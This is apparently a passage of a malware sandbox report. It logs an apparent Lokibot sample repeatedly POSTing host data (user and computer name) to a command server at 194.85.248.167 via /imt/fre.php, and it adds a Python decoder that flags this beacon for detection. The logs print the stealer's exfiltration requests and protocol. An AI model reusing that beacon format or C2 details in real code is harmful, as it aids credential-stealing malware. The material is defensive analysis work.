                  Nov 25, 2021 18:23:41.911195993 CET4982980192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:41.914761066 CET4982980192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:42.157748938 CET4982980192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:42.185556889 CET8049829194.85.248.167192.168.2.3
                  Nov 25, 2021 18:23:42.233618021 CET8049829194.85.248.167192.168.2.3
                  Nov 25, 2021 18:23:42.233639956 CET8049829194.85.248.167192.168.2.3
                  Nov 25, 2021 18:23:42.233769894 CET4982980192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:42.233830929 CET4982980192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:42.262592077 CET8049829194.85.248.167192.168.2.3
                  Nov 25, 2021 18:23:43.379654884 CET4983380192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:44.609067917 CET8049833194.85.248.167192.168.2.3
                  Nov 25, 2021 18:23:44.609219074 CET4983380192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:44.612993956 CET4983380192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:44.640420914 CET8049833194.85.248.167192.168.2.3
                  Nov 25, 2021 18:23:44.640516996 CET4983380192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:44.667843103 CET8049833194.85.248.167192.168.2.3
                  Nov 25, 2021 18:23:44.707284927 CET8049833194.85.248.167192.168.2.3
                  Nov 25, 2021 18:23:44.707828045 CET4983380192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:44.735332012 CET8049833194.85.248.167192.168.2.3
                  Nov 25, 2021 18:23:44.963197947 CET8049833194.85.248.167192.168.2.3
                  Nov 25, 2021 18:23:44.965779066 CET4983380192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:45.713177919 CET4984580192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:45.740890980 CET8049845194.85.248.167192.168.2.3
                  Nov 25, 2021 18:23:45.741034031 CET4984580192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:45.744734049 CET4984580192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:45.772430897 CET8049845194.85.248.167192.168.2.3
                  Nov 25, 2021 18:23:45.772535086 CET4984580192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:45.839463949 CET8049845194.85.248.167192.168.2.3
                  Nov 25, 2021 18:23:45.839569092 CET8049845194.85.248.167192.168.2.3
                  Nov 25, 2021 18:23:45.839636087 CET4984580192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:45.839659929 CET4984580192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:45.873326063 CET8049845194.85.248.167192.168.2.3
                  Nov 25, 2021 18:23:46.848742008 CET4985180192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:46.876563072 CET8049851194.85.248.167192.168.2.3
                  Nov 25, 2021 18:23:46.876707077 CET4985180192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:46.879978895 CET4985180192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:46.908214092 CET8049851194.85.248.167192.168.2.3
                  Nov 25, 2021 18:23:46.908288956 CET4985180192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:46.935949087 CET8049851194.85.248.167192.168.2.3
                  Nov 25, 2021 18:23:47.403832912 CET8049851194.85.248.167192.168.2.3
                  Nov 25, 2021 18:23:47.404062986 CET4985180192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:47.404071093 CET8049851194.85.248.167192.168.2.3

                  HTTP Request Dependency Graph

                  • 194.85.248.167

                  HTTP Packets

                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  0 | 192.168.2.3 | 49744 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:22:15.658540010 CET | 1080 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 190
                  Connection: close
                  Nov 25, 2021 18:22:15.688220978 CET | 1081 | OUT | Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: 'ckav.ruhardz141700DESKTOP-716T771k08F9C4E9C79A3B52B3F739430tqURv
                  Nov 25, 2021 18:22:17.612982035 CET | 1081 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:15 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 15
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  1 | 192.168.2.3 | 49745 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:22:18.837898016 CET | 1082 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 190
                  Connection: close
                  Nov 25, 2021 18:22:18.866183996 CET | 1082 | OUT | Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: 'ckav.ruhardz141700DESKTOP-716T771+08F9C4E9C79A3B52B3F739430FKPvS
                  Nov 25, 2021 18:22:20.563548088 CET | 1082 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:18 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 15
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  10 | 192.168.2.3 | 49756 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:22:37.775846004 CET | 1116 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:37.803760052 CET | 1116 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:22:39.011204958 CET | 1117 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:37 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  11 | 192.168.2.3 | 49757 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:22:40.734394073 CET | 1118 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:40.762463093 CET | 1118 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:22:41.150240898 CET | 1118 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:40 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  12 | 192.168.2.3 | 49758 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:22:44.172504902 CET | 1119 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:44.200690031 CET | 1119 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:22:44.258064032 CET | 1120 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:44 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  13 | 192.168.2.3 | 49759 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:22:45.537822008 CET | 1120 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:45.566334963 CET | 1121 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:22:45.824769974 CET | 1121 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:22:46.363115072 CET | 1121 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:45 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  14 | 192.168.2.3 | 49760 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:22:47.475042105 CET | 1122 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:47.502764940 CET | 1122 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:22:47.564037085 CET | 1123 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:47 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  15 | 192.168.2.3 | 49761 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:22:48.480655909 CET | 1123 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:48.508594036 CET | 1124 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:22:48.579071045 CET | 1124 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:48 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  16 | 192.168.2.3 | 49762 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:22:51.071537018 CET | 1125 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:51.099267006 CET | 1125 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:22:51.163779974 CET | 1125 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:51 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  17 | 192.168.2.3 | 49763 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:22:52.226443052 CET | 1126 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:52.465967894 CET | 1126 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:22:52.969003916 CET | 1127 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:52 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  18 | 192.168.2.3 | 49765 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:22:54.348325014 CET | 1138 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:54.591702938 CET | 1138 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:22:54.655709982 CET | 1139 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:54 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  19 | 192.168.2.3 | 49766 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:22:55.798213005 CET | 1140 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:56.044425964 CET | 1140 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:22:56.114464998 CET | 1141 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:55 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  2 | 192.168.2.3 | 49746 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:22:21.772417068 CET | 1083 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:21.800093889 CET | 1083 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:22:21.949353933 CET | 1084 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:21 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.
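Every session in this list carries the same request, so one decoder covers them all. The block below is an added example and is not part of the sandbox report: it takes the request bytes as captured above, flags the traits that make this beacon recognisable (the "Mozilla/4.08 (Charon; Inferno)" User-Agent, an HTTP/1.0 POST with a Content-Key header, Content-Encoding: binary to a .php path, and the "ckav.ru" id at body offset 10), decodes the length-prefixed fields of the body as far as the report prints them, and separates the 8-byte binary prefix from the "File not found." text in the 23-byte 404 reply. Assumptions: the body layout (u16, u32, length-prefixed ASCII id, then flag/length/string records) is read off the bytes shown on this page rather than taken from Lokibot source; the meaning of the "hardz", "141700" and "DESKTOP-..." strings is not asserted; the control request is constructed.

```python
"""Parse and flag the beacon captured in the sessions above (added example)."""
import struct
from dataclasses import dataclass

# Constructed from the capture on this page: request line and headers of one
# POST, plus the 82 body bytes the report prints of the 163-byte body.
SAMPLE_REQUEST = (
    b"POST /imt/fre.php HTTP/1.0\r\n"
    b"User-Agent: Mozilla/4.08 (Charon; Inferno)\r\n"
    b"Host: 194.85.248.167\r\n"
    b"Accept: */*\r\n"
    b"Content-Type: application/octet-stream\r\n"
    b"Content-Encoding: binary\r\n"
    b"Content-Key: 3D93679C\r\n"
    b"Content-Length: 163\r\n"
    b"Connection: close\r\n"
    b"\r\n"
) + bytes.fromhex(
    "12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00"
    " 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00"
    " 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00"
    " 2d 00 37 00 31 00 36 00 54 00 37"
)
# The 23-byte body of the server's "404 Not Found" reply, also from the page.
SAMPLE_REPLY_BODY = bytes.fromhex("08 00 00 00 00 00 00 00") + b"File not found."
# Constructed benign POST used as a control; not from the page.
CONTROL_REQUEST = (
    b"POST /api/upload HTTP/1.1\r\nUser-Agent: curl/7.79.1\r\n"
    b"Host: example.invalid\r\nContent-Type: application/octet-stream\r\n"
    b"Content-Length: 5\r\n\r\nhello"
)

LOKIBOT_UA = b"Mozilla/4.08 (Charon; Inferno)"
LOKIBOT_ID = b"ckav.ru"


def parse_http_request(raw: bytes):
    """Split a raw HTTP request into (method, path, version, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, path, version = lines[0].split(b" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return method, path, version, headers, body


def lokibot_indicators(raw: bytes) -> list[str]:
    """Return the traits of the captured beacon that one request matches."""
    method, path, version, headers, body = parse_http_request(raw)
    hits = []
    if headers.get(b"user-agent") == LOKIBOT_UA:
        hits.append("User-Agent Mozilla/4.08 (Charon; Inferno)")
    if method == b"POST" and version == b"HTTP/1.0" and b"content-key" in headers:
        hits.append("HTTP/1.0 POST carrying a Content-Key header")
    if headers.get(b"content-encoding") == b"binary" and path.endswith(b".php"):
        hits.append("Content-Encoding: binary to a .php endpoint")
    if body[10:10 + len(LOKIBOT_ID)] == LOKIBOT_ID:  # after u16 + u32 + u32 length
        hits.append("ckav.ru id at body offset 10")
    return hits


@dataclass
class Beacon:
    version: int        # leading u16 (0x0012 in the capture)
    request_type: int   # following u32 (0x28 in the capture)
    binary_id: str      # length-prefixed ASCII id ("ckav.ru")
    fields: list        # the flag/length-prefixed strings that follow
    truncated: bool     # True when the printed body ends inside a string


def parse_beacon(body: bytes) -> Beacon:
    """Decode the structure visible in the captured body.

    Layout as read off the bytes (an assumption, not taken from Lokibot
    source): u16, u32, u32 length + ASCII id, then repeated
    [u16 flag, u32 byte length, bytes]; flag 0x0001 strings are UTF-16LE.
    A string running past the end is returned as far as it goes.
    """
    version, request_type, id_len = struct.unpack_from("<HII", body, 0)
    off = 10
    binary_id = body[off:off + id_len].decode("ascii", "replace")
    off += id_len
    fields, truncated = [], False
    while off + 6 <= len(body):
        flag, length = struct.unpack_from("<HI", body, off)
        off += 6
        raw = body[off:off + length]
        truncated = truncated or len(raw) < length
        off += length
        codec = "utf-16-le" if flag == 1 else "latin-1"
        fields.append(raw.decode(codec, "ignore"))  # drops a cut-off code unit
    return Beacon(version, request_type, binary_id, fields, truncated)


def split_c2_reply(body: bytes):
    """Separate the 8-byte prefix the C2 prepends from the reply text."""
    return body[:8], body[8:]


if __name__ == "__main__":
    print(lokibot_indicators(SAMPLE_REQUEST))
    print(lokibot_indicators(CONTROL_REQUEST))
    print(parse_beacon(SAMPLE_REQUEST.partition(b"\r\n\r\n")[2]))
    print(split_c2_reply(SAMPLE_REPLY_BODY))
```

Run against the captured request, all four indicators fire and the body decodes to version 0x12, type 0x28, id "ckav.ru" and the strings "hardz", "141700" and "DESKTOP-716T" (the last cut short because the report truncates the body); the constructed control request matches nothing. Matching on the body offset rather than the User-Agent alone is the more robust check, since the User-Agent is trivially changed between builds while the id sits at a fixed position.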


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
